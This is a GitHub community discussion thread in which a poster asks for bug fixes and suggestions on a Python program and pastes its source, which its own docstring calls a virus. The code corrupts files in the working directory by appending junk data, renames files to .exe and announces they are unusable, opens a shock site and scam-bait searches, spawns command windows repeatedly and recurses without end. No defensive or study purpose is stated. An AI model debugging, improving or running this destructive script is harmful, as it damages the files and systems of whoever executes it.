### DISCUSSION TITLE
Feedback on my program.

### DISCUSSION THREAD

**Discussion by ghost** [community/community#54108] [Programming Help]
### Select Topic Area

Question

### Body

Link is right here: 

https://github.com/PyTerminal/Yersinia/blob/main/Yersinia.py

Any bugs? Any suggestions?

**Comment by emilburganov** [comment]
The page is not available

**Comment by ghost** [comment]
The source code:
import os
import webbrowser

os.system("echo Please run this in your terminal. If you don't run this in your terminal it will crash")
def run():
    """
    This function runs the virus by performing the following actions:
    1. Collects a list of files in the current directory
    2. Writes a list of numbers to the file 100 times
    3. Renames each file with a .exe extension
    4. Opens web pages
    5. Open and closes cmd 100 times
    6. Runs again.
    """
    files = []
    numbers = [100000,200000,300000,400000,500000,600000,700000,800000,90000,100000]
    
    # Collect a list of files in the current directory (Payload 1)
    for file in os.listdir():
        if os.path.isdir(file):
            continue
        if os.path.isfile(file):
            if file == "spongebob.py":
                continue
            else:
                files.append(file)
        
        # Write the list of numbers to each file 100 times (Payload 2)
        with open(file, "a") as af:
            for i in range(100):
                af.write(str(list(numbers)))
                 
    # Rename each file with a .exe extension (Payload 3)
    print(files)
    os.replace(file, file + ".exe")
    print("Your files are now unusable! Unless You redownload them")
    
    # Open web pages (Payload 4)
    webbrowser.open("https://piv.pivpiv.dk")
    webbrowser.open("https://www.google.com/search?q=free+bitcoin&rlz=1C9BKJA_enCA1004CA1004&oq=Free+Bitcoin&aqs=chrome.0.0i512l8.")
    webbrowser.open("https://www.google.com/search?q=free+gta+v&rlz=1C9BKJA_enCA1004CA1004&oq=Free+gta+v&aqs=chrome.0.0i512l2j46i512j0i512l7.21020j0j7&hl=en-US&sourceid=chrome-mobile&ie=UTF-8")
    webbrowser.open("https://www.google.com/search?q=Free+robux&rlz=1C9BKJA_enCA1004CA1004&oq=Free+robux&aqs=chrome..69i57j46i273i340i433i650j0i273i433i650j0i273i650l3j0i512l2j0i131i433i512.10941j0j7&hl=en-US&sourceid=chrome-mobile&ie=UTF-8")
    
    #Open and close cmd 100 times (Payload 5)
    for i in range(100):
      os.system("cmd /k exit")
    
   #Run the virus again (Payload 6)
    run()
run()
I changed my account name so I could get the website name pytutorials.github.io
